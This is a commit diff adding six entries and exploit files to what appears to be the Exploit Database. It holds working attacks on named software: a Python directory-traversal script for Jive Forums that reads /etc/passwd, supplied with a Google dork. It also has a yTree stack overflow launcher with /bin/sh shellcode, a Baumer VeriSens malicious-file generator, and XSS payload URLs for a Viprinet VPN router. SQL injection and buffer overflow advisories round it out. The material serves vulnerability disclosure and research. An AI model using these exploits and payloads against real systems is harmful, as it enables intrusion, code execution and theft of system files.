DB: 2016-02-04

6 new exploits

files.csv

@@ -35413,6 +35413,7 @@ id,file,description,date,author,platform,type,port
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
+39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0
 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
@@ -35641,3 +35642,8 @@ id,file,description,date,author,platform,type,port
 39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0
 39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0
 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
+39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
+39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
+39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
+39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
+39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0

platforms/hardware/webapps/39407.txt

@@ -0,0 +1,50 @@
+
+Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300
+
+CVE: CVE-2014-2045
+
+Vendor: Viprinet
+
+Product: Multichannel VPN Router 300
+
+Affected version: 2013070830/2013080900
+
+Fixed version: 	2014013131/2014020702
+Reported by: Tim Brown
+Details:
+
+	The data supplied to both the `old’ and `new’ web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.
+
+	Stored cross-site scripting could be triggered by:
+
+	
+		Attempting to login with a username of `<script>alert(1)</script>’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log)
+		Creating an account with a username of `<script>alert(1)</script>’ (affects both `old’ and `new’ interfaces once created)
+		Setting the device’s hostname to `<script>alert(1)</script>’  (affects `old’ interface once created)
+	
+
+	A number of locations were identified as being vulnerable to reflective attacks, including:
+
+
+http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
+http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56
+
+
+	The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files.
+
+	These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this.
+ 
+
+               
+Further details at:
+
+ https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
+
+
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

platforms/jsp/webapps/39405.py

@@ -0,0 +1,61 @@
+'''
+JiveForums <=5.5.25 Directory Traversal Vulnerability
+
+Description
+==========
+Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc.
+The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected.
+
+Details
+=======
+Product: JiveSoftware
+Security-Risk: high
+Remote-Exploit: yes
+Vendor-URL: https://www.jivesoftware.com
+
+Credits
+============
+Discovered by: Zhaohuan of Tencent Security
+Site: http://security.tencent.com
+
+Affected Products:
+=================
+Test on  JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
+maybe work <= 5.5.25
+
+Exploit:
+============
+'''
+
+#!/usr/bin/python
+# Author: Zhaohuan || http://weibo.com/hackyou
+# Google Dork: inurl:servlet/JiveServlet
+# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
+#
+# Software Link: https://www.jivesoftware.com
+
+import urllib2
+import sys
+
+print "JiveForums <=5.5.25 Directory Traversal Exploit"
+
+if len(sys.argv) != 3:
+    print "[-] Trying exploit on : <site> <path>"
+    print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0]
+    sys.exit()
+
+payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
+print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload
+response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload)
+readvul=response.read()
+print readvul
+
+
+'''
+Solution:
+============
+Update to jiveforums 5.5.30 or the latest version.
+
+More Information:
+https://www.jivesoftware.com/services-support/
+'''

platforms/linux/dos/39406.py

@@ -0,0 +1,72 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com
+# Program affected: yTree - File manager for terminals v1.94-1.1
+# Description: yTree is prone to a stack-based overflow, an attacker could exploit 
+# this issue to execute arbitrary code in the context of the application. 
+# Failed exploit attempts will result in a denial-of-service condition.
+#
+# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
+#
+# Program Description: This is a file manager that separates files from directories
+# and allows you to select and manage files from different directories.  
+# It works on black and white or color terminals and is UTF-8 locales aware.
+# Vendor homepage: http://www.han.de/~werner/ytree.html
+# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb
+# MD5sum: 7d55d9c7e8afb4405c149463613f596b
+#
+# Program received signal SIGSEGV, Segmentation fault.
+# --------------------------------------------------------------------------[regs]
+#   EAX: 0x41414141  EBX: 0xB7FB8000  ECX: 0x00000000  EDX: 0x08071342  o d I t s z a P c 
+#   ESI: 0xBFFFF134  EDI: 0x41414141  EBP: 0x0806FC60  ESP: 0xBFFFDC50  EIP: 0xB7F888C1
+#   CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
+# --------------------------------------------------------------------------[code]
+# => 0xb7f888c1 <werase+49>: mov    eax,DWORD PTR [eax+0x4c]
+#    0xb7f888c4 <werase+52>: mov    DWORD PTR [esp+0x24],eax
+#    0xb7f888c8 <werase+56>: mov    eax,DWORD PTR [edi+0x50]
+#    0xb7f888cb <werase+59>: mov    DWORD PTR [esp+0x28],eax
+#    0xb7f888cf <werase+63>: mov    eax,DWORD PTR [edi+0x54]
+#    0xb7f888d2 <werase+66>: mov    DWORD PTR [esp+0x2c],eax
+#    0xb7f888d6 <werase+70>: mov    eax,DWORD PTR [edi+0x58]
+#    0xb7f888d9 <werase+73>: mov    DWORD PTR [esp+0x30],eax
+# --------------------------------------------------------------------------------
+# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
+# gdb$ backtrace 
+# 0  0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
+# 1  0x08050f43 in ?? ()
+# 2  0x08051182 in ?? ()
+# 3  0x0805972f in ?? ()
+# 4  0x0804a68a in ?? ()
+# 5  0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287
+# 6  0x0804a701 in ?? ()
+ 
+import os,subprocess
+def run():
+  try:
+    print "# yTree Buffer Overflow by Juan Sacco"
+    print "# It's fuzzing time on unusable exploits"
+    print "# This exploit is for educational purposes only"
+    # JUNK + SHELLCODE + NOPS + EIP
+ 
+    junk = "\x41"*65
+    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+    nops = "\x90"*1200
+    eip = "\xd0\xf6\xff\xbf"
+    subprocess.call(["ytree",' ', junk + shellcode + nops + eip])
+ 
+  except OSError as e:
+    if e.errno == os.errno.ENOENT:
+        print "Sorry, yTree not found!"
+    else:
+        print "Error executing exploit"
+    raise
+ 
+def howtousage():
+  print "Snap! Something went wrong"
+  sys.exit(-1)
+ 
+if __name__ == '__main__':
+  try:
+    print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
+    print "Author: Juan Sacco"
+  except IndexError:
+    howtousage()
+run()

platforms/php/webapps/39404.txt

@@ -0,0 +1,37 @@
+#############################
+Exploit Title : Timeclock-software - Multiple SQL injections
+Author:Marcela Benetrix
+Date: 01/27/2016
+version: 0.995 (older version may be vulnerable too)
+software link:http://timeclock-software.net
+
+#############################
+Timeclock software
+
+Timeclock-software.net's free software product will be a simple solution to
+allow your employees to record their time in one central location for easy
+access.
+
+##########################
+SQL Injection Location
+
+1. http://server/login.php
+username and password were vulnerable to time-based blind sql injection
+type.
+
+Moreover, once logged into the app; the following URLs were found to be
+vulnerable too:
+
+2. http://server/view_data.php?period_id
+3. http://server/edit_type.php?type_id=
+4. http://server/edit_user.php?user_id=
+5. http://server/edit_entry.php?time_id=
+
+All of them are vulnerable to Union query and time-based blind.
+
+
+##########################
+Vendor Notification
+01/27/2016 to: the developers. They replied immediately and fixed the
+problem in a new release
+002/03/2016: Disclosure

platforms/windows/dos/39158.txt

@@ -0,0 +1,48 @@
+Dear List,
+
+Greetings from vishnu (@dH4wk)
+
+1. Vulnerable Product
+
+   - Advanced Encryption Package
+   - Company http://www.aeppro.com/
+
+2. Vulnerability Information
+
+ (A) Buffer OverFlow
+     Impact: Attacker gains administrative access
+     Remotely Exploitable: No
+     Locally Exploitable: Yes
+
+
+3. Vulnerability Description
+     A 1006 byte causes the overflow. It is due to the inefficient/improper
+handling of exception. This is an SEH based stack overflow and is
+exploitable..
+
+4. Reproduction:
+     It can be reproduced by pasting 1006 "A"s or any characters in the
+field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
+tab..
+
+
+
+*Windbg Output*
+==============================================================
+(a34.a38): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Module load completed but symbols could not be loaded for
+image00000000`00400000
+image00000000_00400000+0x19c0:
+004019c0 f00fc108        lock xadd dword ptr [eax],ecx
+ds:002b:4141413d=????????
+
+(a34.a38): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+41414141 ??
+==============================================================
+
+Regards,
+Vishnu Raju.

platforms/windows/dos/39403.py

@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+#
+#
+# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability
+#
+#
+# Vendor: Baumer Holding AG | Baumer Optronic GmbH
+# Product web page: http://www.baumer.com
+# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/
+# Affected version: 2.6.2 (ID-CS-XF-XC)
+#
+# Summary: The Baumer Application Suite is the intuitive configuration
+# software for VeriSens vision sensors, which makes it quick and simple
+# for even new users to implement image processing tasks. Starting with
+# the creation of test tasks through to the management of jobs, the program
+# will take you through just a few steps to reach your goal.
+#
+# Desc: The vulnerability is caused due to a boundary error in baselibs.dll
+# library when processing device job file, which can be exploited to cause
+# a buffer overflow when a user opens e.g. a specially crafted .APP file.
+# Successful exploitation could allow execution of arbitrary code on the
+# affected machine.
+#
+# -------------------------------------------------------------------------
+# (78c.cb0): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll - 
+# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010
+# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0         nv up ei pl nz na po nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+# baselibs!b_Int_restore+0x6:
+# 56bc4186 8b00            mov     eax,dword ptr [eax]  ds:002b:4d81ab45=????????
+# 0:000> u
+# baselibs!b_Int_restore+0x6:
+# 56bc4186 8b00            mov     eax,dword ptr [eax]
+# 56bc4188 8bc8            mov     ecx,eax
+# 56bc418a 8bd0            mov     edx,eax
+# 56bc418c c1ea18          shr     edx,18h
+# 56bc418f c1f908          sar     ecx,8
+# 56bc4192 81e100ff0000    and     ecx,0FF00h
+# 56bc4198 0bca            or      ecx,edx
+# 56bc419a 8bd0            mov     edx,eax
+# 0:000> dds
+# 56bc6b86  00107d80
+# 56bc6b8a  8b117457
+# 56bc6b8e  f0e181cb
+# 56bc6b92  e8000000
+# 56bc6b96  fffff9e6
+# 56bc6b9a  02ebf88b
+# 56bc6b9e  ff85fa8b
+# 56bc6ba6  68000001
+# 56bc6baa  56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154
+# 56bc6bae  3f8ce857
+# 56bc6bb2  c483ffff
+# 56bc6bb6  75c0850c USER32!SetKeyboardState+0x705a
+# 56bc6bba  325b5f07
+# -------------------------------------------------------------------------
+#
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+#            Microsoft Windows 7 Ultimate SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2016-5303
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php
+#
+#
+# 14.11.2015
+#
+
+header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
+          "\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
+          " \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
+          "\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F
+
+buffer = "\x41" * 6719 + "\x42\x42\x42\x42"
+ 
+f = open ("exploit.app", "w")
+f.write(header + buffer +'\x0F')
+f.close()
+print "File exploit.app created!\n"
+
+#
+# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip
+#          https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip
+#